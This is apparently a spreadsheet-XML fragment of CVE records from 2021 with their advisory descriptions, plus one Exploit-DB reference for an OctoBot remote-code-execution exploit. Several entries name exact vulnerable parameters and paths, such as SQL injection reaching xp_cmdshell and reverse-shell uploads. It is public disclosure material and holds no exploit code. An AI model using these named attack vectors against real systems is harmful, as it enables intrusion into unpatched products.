    <t>PuTTY through 0.75 proceeds with establishing an SSH session even if it has never sent a substantive authentication response. This makes it easier for an attacker-controlled SSH server to present a later spoofed authentication prompt (that the attacker can use to capture credential data, and use that data for purposes that are undesired by the client user).</t>
  </si>
  <si>
    <t>CVE-2021-36368</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in OpenSSH before 8.9. If a client is using public-key authentication with agent forwarding but without -oLogLevel=verbose, and an attacker has silently modified the server to support the None authentication option, then the user cannot determine whether FIDO authentication is going to confirm that the user wishes to connect to that server, or that the user wishes to allow that server to connect to a different server on the user's behalf. NOTE: the vendor's position is "this is not an authentication bypass, since nothing is being bypassed."</t>
  </si>
  <si>
    <t>CVE-2021-36369</t>
  </si>
  <si>
    <t>An issue was discovered in Dropbear through 2020.81. Due to a non-RFC-compliant check of the available authentication methods in the client-side SSH code, it is possible for an SSH server to change the login process in its favor. This attack can bypass additional security measures such as FIDO2 tokens or SSH-Askpass. Thus, it allows an attacker to abuse a forwarded agent for logging on to another server unnoticed.</t>
  </si>
  <si>
    <t>CVE-2021-3637</t>
  </si>
  <si>
    <t>A flaw was found in keycloak-model-infinispan in keycloak versions before 14.0.0 where authenticationSessions map in RootAuthenticationSessionEntity grows boundlessly which could lead to a DoS attack.</t>
  </si>
  <si>
    <t>CVE-2021-36370</t>
  </si>
  <si>
    <t>An issue was discovered in Midnight Commander through 4.8.26. When establishing an SFTP connection, the fingerprint of the server is neither checked nor displayed. As a result, a user connects to the server without the ability to verify its authenticity.</t>
  </si>
  <si>
    <t>CVE-2021-36371</t>
  </si>
  <si>
    <t>Emissary-Ingress (formerly Ambassador API Gateway) through 1.13.9 allows attackers to bypass client certificate requirements (i.e., mTLS cert_required) on backend upstreams when more than one TLSContext is defined and at least one configuration exists that does not require client certificate authentication. The attacker must send an SNI specifying an unprotected backend and an HTTP Host header specifying a protected backend. (2.x versions are unaffected. 1.x versions are unaffected with certain configuration settings involving prune_unreachable_routes and a wildcard Host resource.)</t>
  </si>
  <si>
    <t>CVE-2021-36372</t>
  </si>
  <si>
    <t>In Apache Ozone versions prior to 1.2.0, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.</t>
  </si>
  <si>
    <t>CVE-2021-36373</t>
  </si>
  <si>
    <t>When reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.</t>
  </si>
  <si>
    <t>CVE-2021-36374</t>
  </si>
  <si>
    <t>When reading a specially crafted ZIP archive, or a derived formats, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used derived formats from ZIP archives are for instance JAR files and many office files. Apache Ant prior to 1.9.16 and 1.10.11 were affected.</t>
  </si>
  <si>
    <t>CVE-2021-36376</t>
  </si>
  <si>
    <t>dandavison delta before 0.8.3 on Windows resolves an executable's pathname as a relative path from the current directory.</t>
  </si>
  <si>
    <t>CVE-2021-36377</t>
  </si>
  <si>
    <t>Fossil before 2.14.2 and 2.15.x before 2.15.2 often skips the hostname check during TLS certificate validation.</t>
  </si>
  <si>
    <t>CVE-2021-3638</t>
  </si>
  <si>
    <t>An out-of-bounds memory access flaw was found in the ATI VGA device emulation of QEMU. This flaw occurs in the ati_2d_blt() routine while handling MMIO write operations when the guest provides invalid values for the destination display parameters. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36380</t>
  </si>
  <si>
    <t>Sunhillo SureLine before 8.7.0.1.1 allows Unauthenticated OS Command Injection via shell metacharacters in ipAddr or dnsAddr /cgi/networkDiag.cgi.</t>
  </si>
  <si>
    <t>CVE-2021-36381</t>
  </si>
  <si>
    <t>In Edifecs Transaction Management through 2021-07-12, an unauthenticated user can inject arbitrary text into a user's browser via logon.jsp?logon_error= on the login screen of the Web application.</t>
  </si>
  <si>
    <t>CVE-2021-36382</t>
  </si>
  <si>
    <t>Devolutions Server before 2021.1.18, and LTS before 2020.3.20, allows attackers to intercept private keys via a man-in-the-middle attack against the connections/partial endpoint (which accepts cleartext).</t>
  </si>
  <si>
    <t>CVE-2021-36383</t>
  </si>
  <si>
    <t>Xen Orchestra (with xo-web through 5.80.0 and xo-server through 5.84.0) mishandles authorization, as demonstrated by modified WebSocket resourceSet.getAll data is which the attacker changes the permission field from none to admin. The attacker gains access to data sets such as VMs, Backups, Audit, Users, and Groups.</t>
  </si>
  <si>
    <t>CVE-2021-36385</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability in Cerner Mobile Care 5.0.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via a Fullwidth Apostrophe (aka U+FF07) in the default.aspx User ID field. Arbitrary system commands can be executed through the use of xp_cmdshell.</t>
  </si>
  <si>
    <t>CVE-2021-36386</t>
  </si>
  <si>
    <t>report_vbuild in report.c in Fetchmail before 6.4.20 sometimes omits initialization of the vsnprintf va_list argument, which might allow mail servers to cause a denial of service or possibly have unspecified other impact via long error messages. NOTE: it is unclear whether use of Fetchmail on any realistic platform results in an impact beyond an inconvenience to the client user.</t>
  </si>
  <si>
    <t>CVE-2021-36387</t>
  </si>
  <si>
    <t>In Yellowfin before 9.6.1 there is a Stored Cross-Site Scripting vulnerability in the video embed functionality exploitable through a specially crafted HTTP POST request to the page "ActivityStreamAjax.i4".</t>
  </si>
  <si>
    <t>CVE-2021-36388</t>
  </si>
  <si>
    <t>In Yellowfin before 9.6.1 it is possible to enumerate and download users profile pictures through an Insecure Direct Object Reference vulnerability exploitable by sending a specially crafted HTTP GET request to the page "MIIAvatarImage.i4".</t>
  </si>
  <si>
    <t>CVE-2021-36389</t>
  </si>
  <si>
    <t>In Yellowfin before 9.6.1 it is possible to enumerate and download uploaded images through an Insecure Direct Object Reference vulnerability exploitable by sending a specially crafted HTTP GET request to the page "MIImage.i4".</t>
  </si>
  <si>
    <t>CVE-2021-3639</t>
  </si>
  <si>
    <t>A flaw was found in mod_auth_mellon where it does not sanitize logout URLs properly. This issue could be used by an attacker to facilitate phishing attacks by tricking users into visiting a trusted web application URL that redirects to an external and potentially malicious server. The highest threat from this liability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-3640</t>
  </si>
  <si>
    <t>A flaw use-after-free in function sco_sock_sendmsg() of the Linux kernel HCI subsystem was found in the way user calls ioct UFFDIO_REGISTER or other way triggers race condition of the call sco_conn_del() together with the call sco_sock_sendmsg() with the expected controllable faulting memory page. A privileged local user could use this flaw to crash the system or escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2021-36408</t>
  </si>
  <si>
    <t>An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.</t>
  </si>
  <si>
    <t>CVE-2021-36409</t>
  </si>
  <si>
    <t>There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2021-3641</t>
  </si>
  <si>
    <t>Improper Link Resolution Before File Access ('Link Following') vulnerability in the EPAG component of Bitdefender Endpoint Security Tools for Windows allows a local attacker to cause a denial of service. This issue affects: Bitdefender GravityZone version 7.1.2.33 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36410</t>
  </si>
  <si>
    <t>A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265.</t>
  </si>
  <si>
    <t>CVE-2021-36411</t>
  </si>
  <si>
    <t>An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36412</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via the gp_rtp_builder_do_mpeg12_video function, which allows attackers to possibly have unspecified other impact via a crafted file in the MP4Box command,</t>
  </si>
  <si>
    <t>CVE-2021-36414</t>
  </si>
  <si>
    <t>A heab-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via media.c, which allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-36417</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability exists in GPAC v1.0.1 in the gf_isom_dovi_config_get function in MP4Box, which causes a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3642</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly Elytron in versions prior to 1.10.14.Final, prior to 1.15.5.Final and prior to 1.16.1.Final where ScramServer may be susceptible to Timing Attack if enabled. The highest threat of this vulnerability is confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-3643</t>
  </si>
  <si>
    <t>A flaw was found in sox 14.4.1. The lsx_adpcm_init function within libsox leads to a global-buffer-overflow. This flaw allows an attacker to input a malicious file, leading to the disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3644</t>
  </si>
  <si>
    <t>A flaw was found in wildfly-core in all versions. If a vault expression is in the form of a single attribute that contains multiple expressions, a user who was granted access to the management interface can potentially access a vault expression they should not be able to access and possibly retrieve the item which was stored in the vault. The highest threat from this vulnerability is data confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-36440</t>
  </si>
  <si>
    <t>Unrestricted File Upload in ShowDoc v2.9.5 allows remote attackers to execute arbitrary code via the 'file_url' parameter in the component AdminUpdateController.class.php'.</t>
  </si>
  <si>
    <t>CVE-2021-3645</t>
  </si>
  <si>
    <t>merge is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-36450</t>
  </si>
  <si>
    <t>Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.</t>
  </si>
  <si>
    <t>CVE-2021-36454</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Naviwebs Navigate Cms 2.9 via the navigate-quickse parameter to 1) backups\backups.php, 2) blocks\blocks.php, 3) brands\brands.php, 4) comments\comments.php, 5) coupons\coupons.php, 6) feeds\feeds.php, 7) functions\functions.php, 8) items\items.php, 9) menus\menus.php, 10) orders\orders.php, 11) payment_methods\payment_methods.php, 12) products\products.php, 13) profiles\profiles.php, 14) shipping_methods\shipping_methods.php, 15) templates\templates.php, 16) users\users.php, 17) webdictionary\webdictionary.php, 18) websites\websites.php, and 19) webusers\webusers.php because the initial_url function is built in these files.</t>
  </si>
  <si>
    <t>CVE-2021-36455</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Naviwebs Navigate CMS 2.9 via the quicksearch parameter in \lib\packages\comments\comments.php.</t>
  </si>
  <si>
    <t>CVE-2021-3646</t>
  </si>
  <si>
    <t>btcpayserver is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-36460</t>
  </si>
  <si>
    <t>VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. This allows an attacker in possession of a hash to takeover a user's account, rendering the benefits of storing hashed passwords in the database useless.</t>
  </si>
  <si>
    <t>CVE-2021-36461</t>
  </si>
  <si>
    <t>An Arbitrary File Upload vulnerability exists in Microweber 1.1.3 that allows attackers to getshell via the Settings Upload Picture section by uploading pictures with malicious code, user.ini.</t>
  </si>
  <si>
    <t>CVE-2021-3647</t>
  </si>
  <si>
    <t>URI.js is vulnerable to URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>CVE-2021-36483</t>
  </si>
  <si>
    <t>DevExpress.XtraReports.UI through v21.1 allows attackers to execute arbitrary code via insecure deserialization.</t>
  </si>
  <si>
    <t>CVE-2021-3649</t>
  </si>
  <si>
    <t>chatwoot is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-36512</t>
  </si>
  <si>
    <t>An issue was discovered in function scanallsubs in src/sbbs3/scansubs.cpp in Synchronet BBS, which may allow attackers to view sensitive information due to an uninitialized value.</t>
  </si>
  <si>
    <t>CVE-2021-36513</t>
  </si>
  <si>
    <t>An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value.</t>
  </si>
  <si>
    <t>CVE-2021-3652</t>
  </si>
  <si>
    <t>A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.</t>
  </si>
  <si>
    <t>CVE-2021-3653</t>
  </si>
  <si>
    <t>A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "int_ctl" field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7.</t>
  </si>
  <si>
    <t>CVE-2021-36530</t>
  </si>
  <si>
    <t>ngiflib 0.4 has a heap overflow in GetByteStr() at ngiflib.c:108 in NGIFLIB_NO_FILE mode, GetByteStr() copy memory buffer without checking the boundary.</t>
  </si>
  <si>
    <t>CVE-2021-36531</t>
  </si>
  <si>
    <t>ngiflib 0.4 has a heap overflow in GetByte() at ngiflib.c:70 in NGIFLIB_NO_FILE mode, GetByte() reads memory buffer without checking the boundary.</t>
  </si>
  <si>
    <t>CVE-2021-3654</t>
  </si>
  <si>
    <t>A vulnerability was found in openstack-nova's console proxy, noVNC. By crafting a malicious URL, noVNC could be made to redirect to any desired URL.</t>
  </si>
  <si>
    <t>CVE-2021-36542</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in the /op/op.LockDocument.php in SeedDMS v5.1.x&lt;5.1.23 and v6.0.x &lt;6.0.16 allows a remote attacker to lock any document without victim's knowledge, by enticing an authenticated user to visit an attacker's web page.</t>
  </si>
  <si>
    <t>CVE-2021-36543</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF) vulnerability in the /op/op.UnlockDocument.php in SeedDMS v5.1.x &lt;5.1.23 and v6.0.x &lt;6.0.16 allows a remote attacker to unlock any document without victim's knowledge, by enticing an authenticated user to visit an attacker's web page.</t>
  </si>
  <si>
    <t>CVE-2021-36547</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in the component /codebase/dir.php?type=filenew of Mara v7.5 allows attackers to execute arbitrary commands via a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2021-36548</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in the component /admin/index.php?id=themes&amp;action=edit_template&amp;filename=blog of Monstra v3.0.4 allows attackers to execute arbitrary commands via a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2021-3655</t>
  </si>
  <si>
    <t>A vulnerability was found in the Linux kernel in versions prior to v5.14-rc1. Missing size validations on inbound SCTP packets may allow the kernel to read uninitialized memory.</t>
  </si>
  <si>
    <t>CVE-2021-36550</t>
  </si>
  <si>
    <t>TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-browse_categories.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Create category module.</t>
  </si>
  <si>
    <t>CVE-2021-36551</t>
  </si>
  <si>
    <t>TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-calendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Add Event module.</t>
  </si>
  <si>
    <t>CVE-2021-3656</t>
  </si>
  <si>
    <t>A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.</t>
  </si>
  <si>
    <t>CVE-2021-36560</t>
  </si>
  <si>
    <t>Phone Shop Sales Managements System using PHP with Source Code 1.0 is vulnerable to authentication bypass which leads to account takeover of the admin.</t>
  </si>
  <si>
    <t>CVE-2021-36563</t>
  </si>
  <si>
    <t>The CheckMK management web console (versions 1.5.0 to 2.0.0) does not sanitise user input in various parameters of the WATO module. This allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts), the XSS payload will be triggered when the user accesses some specific sections of the application. In the same sense a very dangerous potential way would be when an attacker who has the monitor role (not administrator) manages to get a stored XSS to steal the secretAutomation (for the use of the API in administrator mode) and thus be able to create another administrator user who has high privileges on the CheckMK monitoring web console. Another way is that persistent XSS allows an attacker to modify the displayed content or change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session.</t>
  </si>
  <si>
    <t>CVE-2021-36564</t>
  </si>
  <si>
    <t>ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php.</t>
  </si>
  <si>
    <t>CVE-2021-36567</t>
  </si>
  <si>
    <t>ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\AbstractCache.</t>
  </si>
  <si>
    <t>CVE-2021-36568</t>
  </si>
  <si>
    <t>In certain Moodle products after creating a course, it is possible to add in a arbitrary "Topic" a resource, in this case a "Database" with the type "Text" where its values "Field name" and "Field description" are vulnerable to Cross Site Scripting Stored(XSS). This affects Moodle 3.11 and Moodle 3.10.4 and Moodle 3.9.7.</t>
  </si>
  <si>
    <t>CVE-2021-3657</t>
  </si>
  <si>
    <t>A flaw was found in mbsync versions prior to 1.4.4. Due to inadequate handling of extremely large (&gt;=2GiB) IMAP literals, malicious or compromised IMAP servers, and hypothetically even external email senders, could cause several different buffer overflows, which could conceivably be exploited for remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3658</t>
  </si>
  <si>
    <t>bluetoothd from bluez incorrectly saves adapters' Discoverable status when a device is powered down, and restores it when powered up. If a device is powered down while discoverable, it will be discoverable when powered on again. This could lead to inadvertent exposure of the bluetooth stack to physically nearby attackers.</t>
  </si>
  <si>
    <t>CVE-2021-36581</t>
  </si>
  <si>
    <t>Kooboo CMS 2.1.1.0 is vulnerable to Insecure file upload. It is possible to upload any file extension to the server. The server does not verify the extension of the file and the tester was able to upload an aspx to the server.</t>
  </si>
  <si>
    <t>CVE-2021-36582</t>
  </si>
  <si>
    <t>In Kooboo CMS 2.1.1.0, it is possible to upload a remote shell (e.g., aspx) to the server and then call upon it to receive a reverse shell from the victim server. The files are uploaded to /Content/Template/root/reverse-shell.aspx and can be simply triggered by browsing that URL.</t>
  </si>
  <si>
    <t>CVE-2021-36584</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC 1.0.1. There is a heap-based buffer overflow in the function gp_rtp_builder_do_tx3g function in ietf/rtp_pck_3gpp.c, as demonstrated by MP4Box. This can cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2021-3659</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the Linux kernel’s IEEE 802.15.4 wireless networking subsystem in the way the user closes the LR-WPAN connection. This flaw allows a local user to crash the system. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3660</t>
  </si>
  <si>
    <t>Cockpit (and its plugins) do not seem to protect itself against clickjacking. It is possible to render a page from a cockpit server via another website, inside an &lt;iFrame&gt; HTML entry. This may be used by a malicious website in clickjacking or similar attacks.</t>
  </si>
  <si>
    <t>CVE-2021-36601</t>
  </si>
  <si>
    <t>GetSimpleCMS 3.3.16 contains a cross-site Scripting (XSS) vulnerability, where Function TSL does not filter check settings.php Website URL: "siteURL" parameter.</t>
  </si>
  <si>
    <t>CVE-2021-36605</t>
  </si>
  <si>
    <t>engineercms 1.03 is vulnerable to Cross Site Scripting (XSS). There is no escaping in the nickname field on the user list page. When viewing this page, the JavaScript code will be executed in the user's browser.</t>
  </si>
  <si>
    <t>CVE-2021-36608</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /projects/editproject.php.</t>
  </si>
  <si>
    <t>CVE-2021-36609</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /linkedcontent/editfolder.php.</t>
  </si>
  <si>
    <t>CVE-2021-36613</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the ptp process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2021-36614</t>
  </si>
  <si>
    <t>Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the tr069-client process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).</t>
  </si>
  <si>
    <t>CVE-2021-3662</t>
  </si>
  <si>
    <t>Certain HP Enterprise LaserJet and PageWide MFPs may be vulnerable to stored cross site scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2021-36621</t>
  </si>
  <si>
    <t>Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL Injection. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, an attacker can decrypt and obtain the plain-text password. Hence, the attacker could authenticate as Administrator.</t>
  </si>
  <si>
    <t>CVE-2021-36622</t>
  </si>
  <si>
    <t>Sourcecodester Online Covid Vaccination Scheduler System 1.0 is affected vulnerable to Arbitrary File Upload. The admin panel has an upload function of profile photo accessible at http://localhost/scheduler/admin/?page=user. An attacker could upload a malicious file such as shell.php with the Content-Type: image/png. Then, the attacker have to visit the uploaded profile photo to access the shell.</t>
  </si>
  <si>
    <t>CVE-2021-36623</t>
  </si>
  <si>
    <t>Arbitrary File Upload in Sourcecodester Phone Shop Sales Management System 1.0 enables RCE.</t>
  </si>
  <si>
    <t>CVE-2021-36624</t>
  </si>
  <si>
    <t>Sourcecodester Phone Shop Sales Managements System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2021-36625</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in Dolibarr ERP/CRM 13.0.2 (fixed version is 14.0.0) via a POST request to the country_id parameter in an UPDATE statement.</t>
  </si>
  <si>
    <t>CVE-2021-3663</t>
  </si>
  <si>
    <t>firefly-iii is vulnerable to Improper Restriction of Excessive Authentication Attempts</t>
  </si>
  <si>
    <t>CVE-2021-3664</t>
  </si>
  <si>
    <t>url-parse is vulnerable to URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>CVE-2021-36654</t>
  </si>
  <si>
    <t>CMSuno 1.7 is vulnerable to an authenticated stored cross site scripting in modifying the filename parameter (tgo) while updating the theme.</t>
  </si>
  <si>
    <t>CVE-2021-3666</t>
  </si>
  <si>
    <t>body-parser-xml is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-36665</t>
  </si>
  <si>
    <t>An issue was discovered in Druva 6.9.0 for macOS, allows attackers to gain escalated local privileges via the inSyncUpgradeDaemon.</t>
  </si>
  <si>
    <t>CVE-2021-36666</t>
  </si>
  <si>
    <t>An issue was discovered in Druva 6.9.0 for MacOS, allows attackers to gain escalated local privileges via the inSyncDecommission.</t>
  </si>
  <si>
    <t>CVE-2021-36667</t>
  </si>
  <si>
    <t>Command injection vulnerability in Druva inSync 6.9.0 for MacOS, allows attackers to execute arbitrary commands via crafted payload to the local HTTP server due to un-sanitized call to the python os.system library.</t>
  </si>
  <si>
    <t>CVE-2021-36668</t>
  </si>
  <si>
    <t>URL injection in Driva inSync 6.9.0 for MacOS, allows attackers to force a visit to an arbitrary url via the port parameter to the Electron App.</t>
  </si>
  <si>
    <t>CVE-2021-3667</t>
  </si>
  <si>
    <t>An improper locking issue was found in the virStoragePoolLookupByTargetPath API of libvirt. It occurs in the storagePoolLookupByTargetPath function where a locked virStoragePoolObj object is not properly released on ACL permission failure. Clients connecting to the read-write socket with limited ACL permissions could use this flaw to acquire the lock and prevent other users from accessing storage pool/volume APIs, resulting in a denial of service condition. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3669</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. Measuring usage of the shared memory does not scale with large shared memory segment counts which could lead to resource exhaustion and DoS.</t>
  </si>
  <si>
    <t>CVE-2021-36690</t>
  </si>
  <si>
    <t>** DISPUTED ** A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.</t>
  </si>
  <si>
    <t>CVE-2021-36691</t>
  </si>
  <si>
    <t>libjxl v0.5.0 is affected by a Assertion failed issue in lib/jxl/image.cc jxl::PlaneBase::PlaneBase(). When encoding a malicous GIF file using cjxl, an attacker can trigger a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36692</t>
  </si>
  <si>
    <t>libjxl v0.3.7 is affected by a Divide By Zero in issue in lib/extras/codec_apng.cc jxl::DecodeImageAPNG(). When encoding a malicous APNG file using cjxl, an attacker can trigger a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36695</t>
  </si>
  <si>
    <t>Deskpro cloud and on-premise Deskpro 2021.1.6 and fixed in Deskpro 2021.1.7 contains a cross-site scripting (XSS) vulnerability in the download file feature on a manager profile due to lack of input validation.</t>
  </si>
  <si>
    <t>CVE-2021-36696</t>
  </si>
  <si>
    <t>Deskpro cloud and on-premise Deskpro 2021.1.6 and fixed in Deskpro 2021.1.7 contains a cross-site scripting (XSS) vulnerability in social media links on a user profile due to lack of input validation.</t>
  </si>
  <si>
    <t>CVE-2021-36697</t>
  </si>
  <si>
    <t>With an admin account, the .htaccess file in Artica Pandora FMS &lt;=755 can be overwritten with the File Manager component. The new .htaccess file contains a Rewrite Rule with a type definition. A normal PHP file can be uploaded with this new "file type" and the code can be executed with an HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-36698</t>
  </si>
  <si>
    <t>Pandora FMS through 755 allows XSS via a new Event Filter with a crafted name.</t>
  </si>
  <si>
    <t>CVE-2021-3670</t>
  </si>
  <si>
    <t>MaxQueryDuration not honoured in Samba AD DC LDAP</t>
  </si>
  <si>
    <t>CVE-2021-36701</t>
  </si>
  <si>
    <t>In htmly version 2.8.1, is vulnerable to an Arbitrary File Deletion on the local host when delete backup files. The vulnerability may allow a remote attacker to delete arbitrary know files on the host.</t>
  </si>
  <si>
    <t>CVE-2021-36702</t>
  </si>
  <si>
    <t>The "content" field in the "regular post" page of the "add content" menu under "dashboard" in htmly 2.8.1 has a storage cross site scripting (XSS) vulnerability. It allows remote attackers to send authenticated post-http requests to add / content and inject arbitrary web scripts or HTML through special content.</t>
  </si>
  <si>
    <t>CVE-2021-36703</t>
  </si>
  <si>
    <t>The "blog title" field in the "Settings" menu "config" page of "dashboard" in htmly 2.8.1 has a storage cross site scripting (XSS) vulnerability. It allows remote attackers to send an authenticated post HTTP request to admin/config and inject arbitrary web script or HTML through a special website name.</t>
  </si>
  <si>
    <t>CVE-2021-36705</t>
  </si>
  <si>
    <t>In ProLink PRC2402M V1.0.18 and older, the set_TR069 function in the adm.cgi binary, accessible with a page parameter value of TR069 contains a trivial command injection where the value of the TR069_local_port parameter is passed directly to system.</t>
  </si>
  <si>
    <t>CVE-2021-36706</t>
  </si>
  <si>
    <t>In ProLink PRC2402M V1.0.18 and older, the set_sys_cmd function in the adm.cgi binary, accessible with a page parameter value of sysCMD contains a trivial command injection where the value of the command parameter is passed directly to system.</t>
  </si>
  <si>
    <t>CVE-2021-36707</t>
  </si>
  <si>
    <t>In ProLink PRC2402M V1.0.18 and older, the set_ledonoff function in the adm.cgi binary, accessible with a page parameter value of ledonoff contains a trivial command injection where the value of the led_cmd parameter is passed directly to do_system.</t>
  </si>
  <si>
    <t>CVE-2021-36708</t>
  </si>
  <si>
    <t>In ProLink PRC2402M V1.0.18 and older, the set_sys_init function in the login.cgi binary allows an attacker to reset the password to the administrative interface of the router.</t>
  </si>
  <si>
    <t>CVE-2021-3671</t>
  </si>
  <si>
    <t>A null pointer de-reference was found in the way samba kerberos server handled missing sname in TGS-REQ (Ticket Granting Server - Request). An authenticated user could use this flaw to crash the samba server.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/50979.py</t>
  </si>
  <si>
    <t>OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)</t>
  </si>
  <si>
    <t>2022-07-21</t>
  </si>
  <si>
    <t>CVE-2021-36710</t>
  </si>
  <si>
    <t>ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.</t>
  </si>
  <si>
    <t>CVE-2021-36711</t>
  </si>
  <si>
    <t>WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.</t>
  </si>
  <si>
    <t>CVE-2021-36716</t>
  </si>
